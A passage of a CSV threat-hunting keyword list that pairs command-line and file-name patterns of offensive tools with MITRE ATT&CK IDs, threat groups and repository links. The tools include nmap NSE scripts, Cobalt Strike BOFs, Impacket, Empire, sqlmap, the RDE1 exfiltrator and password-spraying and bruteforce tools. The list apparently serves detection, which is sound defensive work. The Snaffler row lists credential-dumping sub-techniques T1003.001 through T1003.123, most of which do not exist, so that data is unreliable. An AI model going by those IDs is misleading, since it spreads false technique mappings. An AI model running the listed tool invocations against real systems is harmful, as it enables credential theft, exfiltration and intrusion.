auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,0,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -* smuggler.py*,offensive_tool_keyword,smuggler.py,HTML Smuggling Generator,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py,1,0,N/A,9,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z -* snaffler.log*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,0,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -* sniffer-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-hh3c-logins.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-interfaces.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-ios-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-netstat.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-sysdescr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-win32-services.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-win32-shares.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-win32-software.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* snmp-win32-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* SocialBox.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -* socks-auth-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* socks-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* socks-open-proxy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Source c:\windows\*.exe -Target *.exe -Sign*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -* -Source c:\windows\system32\*.dll -Target *.exe -Sign*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -* spawn.x64.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,0,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -* spawn.x64.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,0,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -* spawnto_x64 *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -* spawnto_x86 *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -* spellgen.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -* spellstager.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -* -spn cifs* -session * -clsid * -secrets*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,0,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -* -spn cifs/* -hashes*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -SpooferIP *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Tater.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* SpoolFool *.dll,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* spoolsploit *,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -* spray -ep ex-plan.s365*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* --sql-shell*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* srde_arm_musl https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_armv7 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_debug https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_linux https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_linux_aarch64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_linux_x86_64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_macos https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_release https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_windows https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_windows_x64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* srde_windows_x86 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ssh2-enum-algos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-auth-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-hostkey.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* ssh-publickey-acceptance.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - 